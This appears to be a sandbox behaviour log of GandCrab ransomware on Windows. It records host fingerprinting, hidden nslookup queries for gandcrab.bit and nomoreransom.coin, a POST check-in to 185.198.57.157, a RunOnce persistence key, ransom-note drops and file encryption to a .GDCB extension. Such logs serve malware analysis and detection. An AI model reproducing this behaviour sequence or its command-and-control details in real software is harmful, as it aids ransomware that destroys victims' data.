| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Control Panel\International |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Control Panel\International, value_name = LocaleName, data = 101 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload, value_name = 1, data = 48 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload, value_name = 2, data = 48 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = productName, data = 87 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77410000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x774e1748 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Add HTTP Request Headers | headers = Host: nomoreransom.coin |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ |
|
1 | |
| Inet | Read Response | size = 10238, size_out = 14 |
|
1 | |
| Inet | Read Response | size = 10238, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| File | Create Pipe | pipe_name = Anonymous read pipe, size = 0 |
|
1 | |
| File | Create Pipe | pipe_name = Anonymous read pipe, size = 0 |
|
1 | |
| Process | Create | process_name = nslookup nomoreransom.coin dns1.soprodns.ru, os_pid = 0xa60, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE |
|
1 | |
| File | Read | size = 4096, size_out = 35 |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| File | Create Pipe | pipe_name = Anonymous read pipe, size = 0 |
|
1 | |
| File | Create Pipe | pipe_name = Anonymous read pipe, size = 0 |
|
1 | |
| Process | Create | process_name = nslookup nomoreransom.bit dns1.soprodns.ru, os_pid = 0x8ec, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE |
|
1 | |
| File | Read | size = 4096, size_out = 35 |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| File | Create Pipe | pipe_name = Anonymous read pipe, size = 0 |
|
1 | |
| File | Create Pipe | pipe_name = Anonymous read pipe, size = 0 |
|
1 | |
| Process | Create | process_name = nslookup gandcrab.bit dns2.soprodns.ru, os_pid = 0x490, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE |
|
1 | |
| File | Read | size = 4096, size_out = 53 |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| File | Create Pipe | pipe_name = Anonymous read pipe, size = 0 |
|
1 | |
| File | Create Pipe | pipe_name = Anonymous read pipe, size = 0 |
|
1 | |
| Process | Create | process_name = nslookup nomoreransom.coin dns2.soprodns.ru, os_pid = 0x848, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE |
|
1 | |
| File | Read | size = 4096, size_out = 100 |
|
1 | |
| Module | Get Filename | process_name = c:\users\5jghkoaofdp\appdata\roamingeox20.exe, file_name_orig = C:\Users\5JgHKoaOfdp\AppData\RoamingeOX20.eXe, size = 512 |
|
1 | |
| File | Create | filename = C:\Users\5JgHKoaOfdp\AppData\RoamingeOX20.eXe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\5JgHKoaOfdp\AppData\RoamingeOX20.eXe, filename = C:\Users\5JgHKoaOfdp\AppData\RoamingeOX20.eXe, protection = PAGE_WRITECOPY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\5JgHKoaOfdp\AppData\RoamingeOX20.eXe, process_name = c:\users\5jghkoaofdp\appdata\roamingeox20.exe, desired_access = FILE_MAP_COPY |
|
1 | |
| Module | Unmap | process_name = c:\users\5jghkoaofdp\appdata\roamingeox20.exe |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 185.198.57.157, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP/1.1, target_resource = curl.php?token=1082, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Add HTTP Request Headers | headers = Host: nomoreransom.coin |
|
1 | |
| Inet | Send HTTP Request | headers = Content-Type: application/x-www-form-urlencoded, url = 185.198.57.157/curl.php?token=1082 |
|
1 | |
| Inet | Read Response | size = 204798, size_out = 5708 |
|
1 | |
| Inet | Read Response | size = 204798, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| System | Get Time | type = Ticks, time = 203984 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 |
Thread 0x8dc
271
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Driver | Enumerate | load_addresses = 1638160 |
|
1 | |
| Driver | Enumerate | load_addresses = 4980736 |
|
1 | |
| Driver | Get Name | load_address = 2329989120 |
|
1 | |
| Driver | Get Name | load_address = 2337890304 |
|
1 | |
| Driver | Get Name | load_address = 2319769600 |
|
1 | |
| Driver | Get Name | load_address = 2036903936 |
|
1 | |
| Driver | Get Name | load_address = 2037321728 |
|
1 | |
| Driver | Get Name | load_address = 2037379072 |
|
1 | |
| Driver | Get Name | load_address = 2037780480 |
|
1 | |
| Driver | Get Name | load_address = 2037919744 |
|
1 | |
| Driver | Get Name | load_address = 2038005760 |
|
1 | |
| Driver | Get Name | load_address = 2036334592 |
|
1 | |
| Driver | Get Name | load_address = 2038046720 |
|
1 | |
| Driver | Get Name | load_address = 2038804480 |
|
1 | |
| Driver | Get Name | load_address = 2039652352 |
|
1 | |
| Driver | Get Name | load_address = 2039721984 |
|
1 | |
| Driver | Get Name | load_address = 2039820288 |
|
1 | |
| Driver | Get Name | load_address = 2039865344 |
|
1 | |
| Driver | Get Name | load_address = 2040430592 |
|
1 | |
| Driver | Get Name | load_address = 2040639488 |
|
1 | |
| Driver | Get Name | load_address = 2041208832 |
|
1 | |
| Driver | Get Name | load_address = 2041249792 |
|
1 | |
| Driver | Get Name | load_address = 2041544704 |
|
1 | |
| Driver | Get Name | load_address = 2041597952 |
|
1 | |
| Driver | Get Name | load_address = 2041712640 |
|
1 | |
| Driver | Get Name | load_address = 2041810944 |
|
1 | |
| Driver | Get Name | load_address = 2042208256 |
|
1 | |
| Driver | Get Name | load_address = 2043158528 |
|
1 | |
| Driver | Get Name | load_address = 2043547648 |
|
1 | |
| Driver | Get Name | load_address = 2043658240 |
|
1 | |
| Driver | Get Name | load_address = 2043777024 |
|
1 | |
| Driver | Get Name | load_address = 2044166144 |
|
1 | |
| Driver | Get Name | load_address = 2044272640 |
|
1 | |
| Driver | Get Name | load_address = 2042626048 |
|
1 | |
| Driver | Get Name | load_address = 2042716160 |
|
1 | |
| Driver | Get Name | load_address = 2045669376 |
|
1 | |
| Driver | Get Name | load_address = 2047725568 |
|
1 | |
| Driver | Get Name | load_address = 2047840256 |
|
1 | |
| Driver | Get Name | load_address = 2047905792 |
|
1 | |
| Driver | Get Name | load_address = 2049560576 |
|
1 | |
| Driver | Get Name | load_address = 2048917504 |
|
1 | |
| Driver | Get Name | load_address = 2050707456 |
|
1 | |
| Driver | Get Name | load_address = 2051710976 |
|
1 | |
| Driver | Get Name | load_address = 2054316032 |
|
1 | |
| Driver | Get Name | load_address = 2054758400 |
|
1 | |
| Driver | Get Name | load_address = 2051014656 |
|
1 | |
| Driver | Get Name | load_address = 2047950848 |
|
1 | |
| Driver | Get Name | load_address = 2054909952 |
|
1 | |
| Driver | Get Name | load_address = 2050908160 |
|
1 | |
| Driver | Get Name | load_address = 2051624960 |
|
1 | |
| Driver | Get Name | load_address = 2048278528 |
|
1 | |
| Driver | Get Name | load_address = 2048393216 |
|
1 | |
| Driver | Get Name | load_address = 2049462272 |
|
1 | |
| Driver | Get Name | load_address = 2045001728 |
|
1 | |
| Driver | Get Name | load_address = 2045038592 |
|
1 | |
| Driver | Get Name | load_address = 2045071360 |
|
1 | |
| Driver | Get Name | load_address = 2058330112 |
|
1 | |
| Driver | Get Name | load_address = 2059907072 |
|
1 | |
| Driver | Get Name | load_address = 2059980800 |
|
1 | |
| Driver | Get Name | load_address = 2060378112 |
|
1 | |
| Driver | Get Name | load_address = 2060451840 |
|
1 | |
| Driver | Get Name | load_address = 2060533760 |
|
1 | |
| Driver | Get Name | load_address = 2060582912 |
|
1 | |
| Driver | Get Name | load_address = 2060713984 |
|
1 | |
| Driver | Get Name | load_address = 2060771328 |
|
1 | |
| Driver | Get Name | load_address = 2057306112 |
|
1 | |
| Driver | Get Name | load_address = 2057908224 |
|
1 | |
| Driver | Get Name | load_address = 2058080256 |
|
1 | |
| Driver | Get Name | load_address = 2045128704 |
|
1 | |
| Driver | Get Name | load_address = 2061991936 |
|
1 | |
| Driver | Get Name | load_address = 2062573568 |
|
1 | |
| Driver | Get Name | load_address = 2062630912 |
|
1 | |
| Driver | Get Name | load_address = 2062680064 |
|
1 | |
| Driver | Get Name | load_address = 2062729216 |
|
1 | |
| Driver | Get Name | load_address = 2062950400 |
|
1 | |
| Driver | Get Name | load_address = 2063044608 |
|
1 | |
| Driver | Get Name | load_address = 2063106048 |
|
1 | |
| Driver | Get Name | load_address = 2063151104 |
|
1 | |
| Driver | Get Name | load_address = 2063220736 |
|
1 | |
| Driver | Get Name | load_address = 2063323136 |
|
1 | |
| Driver | Get Name | load_address = 2061500416 |
|
1 | |
| Driver | Get Name | load_address = 2064314368 |
|
1 | |
| Driver | Get Name | load_address = 2064437248 |
|
1 | |
| Driver | Get Name | load_address = 2064482304 |
|
1 | |
| Driver | Get Name | load_address = 2064490496 |
|
1 | |
| Driver | Get Name | load_address = 2064814080 |
|
1 | |
| Driver | Get Name | load_address = 2064859136 |
|
1 | |
| Driver | Get Name | load_address = 2065297408 |
|
1 | |
| Driver | Get Name | load_address = 2061082624 |
|
1 | |
| Driver | Get Name | load_address = 2065346560 |
|
1 | |
| Driver | Get Name | load_address = 2063597568 |
|
1 | |
| Driver | Get Name | load_address = 2063712256 |
|
1 | |
| Driver | Get Name | load_address = 2063736832 |
|
1 | |
| Driver | Get Name | load_address = 2063421440 |
|
1 | |
| Driver | Get Name | load_address = 2058149888 |
|
1 | |
| Driver | Get Name | load_address = 905216 |
|
1 | |
| Driver | Get Name | load_address = 2063785984 |
|
1 | |
| Driver | Get Name | load_address = 2065637376 |
|
1 | |
| Driver | Get Name | load_address = 2048745472 |
|
1 | |
| Driver | Get Name | load_address = 2063540224 |
|
1 | |
| Driver | Get Name | load_address = 2062884864 |
|
1 | |
| Driver | Get Name | load_address = 2058240000 |
|
1 | |
| Driver | Get Name | load_address = 7020544 |
|
1 | |
| Driver | Get Name | load_address = 8392704 |
|
1 | |
| Driver | Get Name | load_address = 2044723200 |
|
1 | |
| Driver | Get Name | load_address = 2044776448 |
|
1 | |
| Driver | Get Name | load_address = 2044841984 |
|
1 | |
| Driver | Get Name | load_address = 2045587456 |
|
1 | |
| Driver | Get Name | load_address = 2042892288 |
|
1 | |
| Driver | Get Name | load_address = 2066403328 |
|
1 | |
| Driver | Get Name | load_address = 2067427328 |
|
1 | |
| Driver | Get Name | load_address = 2067558400 |
|
1 | |
| Driver | Get Name | load_address = 2065694720 |
|
1 | |
| Driver | Get Name | load_address = 2066141184 |
|
1 | |
| Driver | Get Name | load_address = 2067652608 |
|
1 | |
| Driver | Get Name | load_address = 2042294272 |
|
1 | |
| Driver | Get Name | load_address = 2042990592 |
|
1 | |
| Driver | Get Name | load_address = 2080706560 |
|
1 | |
| Driver | Get Name | load_address = 2081398784 |
|
1 | |
| Driver | Get Name | load_address = 2081443840 |
|
1 | |
| Driver | Get Name | load_address = 2081718272 |
|
1 | |
| Driver | Get Name | load_address = 2082619392 |
|
1 | |
| Driver | Get Name | load_address = 2083328000 |
|
1 | |
| Driver | Get Name | load_address = 2083950592 |
|
1 | |
| Driver | Get Name | load_address = 2084040704 |
|
1 | |
| Driver | Get Name | load_address = 2081976320 |
|
1 | |
| Driver | Enumerate | load_addresses = 1638160 |
|
1 | |
| Driver | Enumerate | load_addresses = 4980736 |
|
1 | |
| Driver | Get Name | load_address = 2329989120 |
|
1 | |
| Driver | Get Name | load_address = 2337890304 |
|
1 | |
| Driver | Get Name | load_address = 2319769600 |
|
1 | |
| Driver | Get Name | load_address = 2036903936 |
|
1 | |
| Driver | Get Name | load_address = 2037321728 |
|
1 | |
| Driver | Get Name | load_address = 2037379072 |
|
1 | |
| Driver | Get Name | load_address = 2037780480 |
|
1 | |
| Driver | Get Name | load_address = 2037919744 |
|
1 | |
| Driver | Get Name | load_address = 2038005760 |
|
1 | |
| Driver | Get Name | load_address = 2036334592 |
|
1 | |
| Driver | Get Name | load_address = 2038046720 |
|
1 | |
| Driver | Get Name | load_address = 2038804480 |
|
1 | |
| Driver | Get Name | load_address = 2039652352 |
|
1 | |
| Driver | Get Name | load_address = 2039721984 |
|
1 | |
| Driver | Get Name | load_address = 2039820288 |
|
1 | |
| Driver | Get Name | load_address = 2039865344 |
|
1 | |
| Driver | Get Name | load_address = 2040430592 |
|
1 | |
| Driver | Get Name | load_address = 2040639488 |
|
1 | |
| Driver | Get Name | load_address = 2041208832 |
|
1 | |
| Driver | Get Name | load_address = 2041249792 |
|
1 | |
| Driver | Get Name | load_address = 2041544704 |
|
1 | |
| Driver | Get Name | load_address = 2041597952 |
|
1 | |
| Driver | Get Name | load_address = 2041712640 |
|
1 | |
| Driver | Get Name | load_address = 2041810944 |
|
1 | |
| Driver | Get Name | load_address = 2042208256 |
|
1 | |
| Driver | Get Name | load_address = 2043158528 |
|
1 | |
| Driver | Get Name | load_address = 2043547648 |
|
1 | |
| Driver | Get Name | load_address = 2043658240 |
|
1 | |
| Driver | Get Name | load_address = 2043777024 |
|
1 | |
| Driver | Get Name | load_address = 2044166144 |
|
1 | |
| Driver | Get Name | load_address = 2044272640 |
|
1 | |
| Driver | Get Name | load_address = 2042626048 |
|
1 | |
| Driver | Get Name | load_address = 2042716160 |
|
1 | |
| Driver | Get Name | load_address = 2045669376 |
|
1 | |
| Driver | Get Name | load_address = 2047725568 |
|
1 | |
| Driver | Get Name | load_address = 2047840256 |
|
1 | |
| Driver | Get Name | load_address = 2047905792 |
|
1 | |
| Driver | Get Name | load_address = 2049560576 |
|
1 | |
| Driver | Get Name | load_address = 2048917504 |
|
1 | |
| Driver | Get Name | load_address = 2050707456 |
|
1 | |
| Driver | Get Name | load_address = 2051710976 |
|
1 | |
| Driver | Get Name | load_address = 2054316032 |
|
1 | |
| Driver | Get Name | load_address = 2054758400 |
|
1 | |
| Driver | Get Name | load_address = 2051014656 |
|
1 | |
| Driver | Get Name | load_address = 2047950848 |
|
1 | |
| Driver | Get Name | load_address = 2054909952 |
|
1 | |
| Driver | Get Name | load_address = 2050908160 |
|
1 | |
| Driver | Get Name | load_address = 2051624960 |
|
1 | |
| Driver | Get Name | load_address = 2048278528 |
|
1 | |
| Driver | Get Name | load_address = 2048393216 |
|
1 | |
| Driver | Get Name | load_address = 2049462272 |
|
1 | |
| Driver | Get Name | load_address = 2045001728 |
|
1 | |
| Driver | Get Name | load_address = 2045038592 |
|
1 | |
| Driver | Get Name | load_address = 2045071360 |
|
1 | |
| Driver | Get Name | load_address = 2058330112 |
|
1 | |
| Driver | Get Name | load_address = 2059907072 |
|
1 | |
| Driver | Get Name | load_address = 2059980800 |
|
1 | |
| Driver | Get Name | load_address = 2060378112 |
|
1 | |
| Driver | Get Name | load_address = 2060451840 |
|
1 | |
| Driver | Get Name | load_address = 2060533760 |
|
1 | |
| Driver | Get Name | load_address = 2060582912 |
|
1 | |
| Driver | Get Name | load_address = 2060713984 |
|
1 | |
| Driver | Get Name | load_address = 2060771328 |
|
1 | |
| Driver | Get Name | load_address = 2057306112 |
|
1 | |
| Driver | Get Name | load_address = 2057908224 |
|
1 | |
| Driver | Get Name | load_address = 2058080256 |
|
1 | |
| Driver | Get Name | load_address = 2045128704 |
|
1 | |
| Driver | Get Name | load_address = 2061991936 |
|
1 | |
| Driver | Get Name | load_address = 2062573568 |
|
1 | |
| Driver | Get Name | load_address = 2062630912 |
|
1 | |
| Driver | Get Name | load_address = 2062680064 |
|
1 | |
| Driver | Get Name | load_address = 2062729216 |
|
1 | |
| Driver | Get Name | load_address = 2062950400 |
|
1 | |
| Driver | Get Name | load_address = 2063044608 |
|
1 | |
| Driver | Get Name | load_address = 2063106048 |
|
1 | |
| Driver | Get Name | load_address = 2063151104 |
|
1 | |
| Driver | Get Name | load_address = 2063220736 |
|
1 | |
| Driver | Get Name | load_address = 2063323136 |
|
1 | |
| Driver | Get Name | load_address = 2061500416 |
|
1 | |
| Driver | Get Name | load_address = 2064314368 |
|
1 | |
| Driver | Get Name | load_address = 2064437248 |
|
1 | |
| Driver | Get Name | load_address = 2064482304 |
|
1 | |
| Driver | Get Name | load_address = 2064490496 |
|
1 | |
| Driver | Get Name | load_address = 2064814080 |
|
1 | |
| Driver | Get Name | load_address = 2064859136 |
|
1 | |
| Driver | Get Name | load_address = 2065297408 |
|
1 | |
| Driver | Get Name | load_address = 2061082624 |
|
1 | |
| Driver | Get Name | load_address = 2065346560 |
|
1 | |
| Driver | Get Name | load_address = 2063597568 |
|
1 | |
| Driver | Get Name | load_address = 2063712256 |
|
1 | |
| Driver | Get Name | load_address = 2063736832 |
|
1 | |
| Driver | Get Name | load_address = 2063421440 |
|
1 | |
| Driver | Get Name | load_address = 2058149888 |
|
1 | |
| Driver | Get Name | load_address = 905216 |
|
1 | |
| Driver | Get Name | load_address = 2063785984 |
|
1 | |
| Driver | Get Name | load_address = 2065637376 |
|
1 | |
| Driver | Get Name | load_address = 2048745472 |
|
1 | |
| Driver | Get Name | load_address = 2063540224 |
|
1 | |
| Driver | Get Name | load_address = 2062884864 |
|
1 | |
| Driver | Get Name | load_address = 2058240000 |
|
1 | |
| Driver | Get Name | load_address = 7020544 |
|
1 | |
| Driver | Get Name | load_address = 8392704 |
|
1 | |
| Driver | Get Name | load_address = 2044723200 |
|
1 | |
| Driver | Get Name | load_address = 2044776448 |
|
1 | |
| Driver | Get Name | load_address = 2044841984 |
|
1 | |
| Driver | Get Name | load_address = 2045587456 |
|
1 | |
| Driver | Get Name | load_address = 2042892288 |
|
1 | |
| Driver | Get Name | load_address = 2066403328 |
|
1 | |
| Driver | Get Name | load_address = 2067427328 |
|
1 | |
| Driver | Get Name | load_address = 2067558400 |
|
1 | |
| Driver | Get Name | load_address = 2065694720 |
|
1 | |
| Driver | Get Name | load_address = 2066141184 |
|
1 | |
| Driver | Get Name | load_address = 2067652608 |
|
1 | |
| Driver | Get Name | load_address = 2042294272 |
|
1 | |
| Driver | Get Name | load_address = 2042990592 |
|
1 | |
| Driver | Get Name | load_address = 2080706560 |
|
1 | |
| Driver | Get Name | load_address = 2081398784 |
|
1 | |
| Driver | Get Name | load_address = 2081443840 |
|
1 | |
| Driver | Get Name | load_address = 2081718272 |
|
1 | |
| Driver | Get Name | load_address = 2082619392 |
|
1 | |
| Driver | Get Name | load_address = 2083328000 |
|
1 | |
| Driver | Get Name | load_address = 2083950592 |
|
1 | |
| Driver | Get Name | load_address = 2084040704 |
|
1 | |
| Driver | Get Name | load_address = 2081976320 |
|
1 | |
| Driver | Enumerate | load_addresses = 1638160 |
|
1 | |
| Driver | Enumerate | load_addresses = 4980736 |
|
1 | |
| Driver | Get Name | load_address = 2329989120 |
|
1 | |
| Driver | Enumerate | load_addresses = 1638048 |
|
1 | |
| Driver | Enumerate | load_addresses = 4980736 |
|
1 | |
| Driver | Enumerate | load_addresses = 1638060 |
|
1 | |
| Driver | Enumerate | load_addresses = 4980736 |
|
1 | |
| Driver | Enumerate | load_addresses = 1638060 |
|
1 | |
| Driver | Enumerate | load_addresses = 4980736 |
|
1 | |
| Driver | Enumerate | load_addresses = 1638060 |
|
1 | |
| Driver | Enumerate | load_addresses = 4980736 |
|
1 | |
| Module | Get Filename | process_name = c:\users\5jghkoaofdp\appdata\roamingeox20.exe, file_name_orig = C:\Users\5JgHKoaOfdp\AppData\RoamingeOX20.eXe, size = 256 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Environment | Get Environment String | name = AppData, result_out = C:\Users\5JgHKoaOfdp\AppData\Roaming |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, value_name = swmrugqukmk, data = "C:\Users\5JgHKoaOfdp\AppData\RoamingeOX20.eXe", size = 94, type = REG_SZ |
|
1 |
Thread 0x824
788
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| File | Create | filename = C:\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Create | filename = C:\$Recycle.Bin\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\$Recycle.Bin\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Create | filename = C:\$Recycle.Bin\S-1-5-19\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\$Recycle.Bin\S-1-5-19\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Create | filename = C:\$Recycle.Bin\S-1-5-21-3643094112-4209292109-138530109-1001\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\$Recycle.Bin\S-1-5-21-3643094112-4209292109-138530109-1001\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Create | filename = C:\Boot\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\BCD.LOG, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\BCD.LOG, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Boot\bg-BG\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\bg-BG\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
| File | Get Info | filename = C:\Boot\bg-BG\bootmgr.exe.mui, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\bg-BG\bootmgr.exe.mui, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Boot\BOOTSTAT.DAT, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x772c8475 |
|
1 | |
| File | Create | filename = C:\Boot\BOOTSTAT.DAT, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Boot\BOOTSTAT.DAT, size = 1048576, size_out = 65536 |
|
1 | |
| File | Write | filename = C:\Boot\BOOTSTAT.DAT, size = 65536 |
|
1 | |
| File | Write | filename = C:\Boot\BOOTSTAT.DAT, size = 256 |
|
2 | |
| File | Write | filename = C:\Boot\BOOTSTAT.DAT, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Boot\BOOTSTAT.DAT, destination_filename = C:\Boot\BOOTSTAT.DAT.GDCB |
|
1 | |
| File | Create | filename = C:\Boot\cs-CZ\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Boot\cs-CZ\\GDCB-DECRYPT.txt, size = 2616 |
|
1 | |
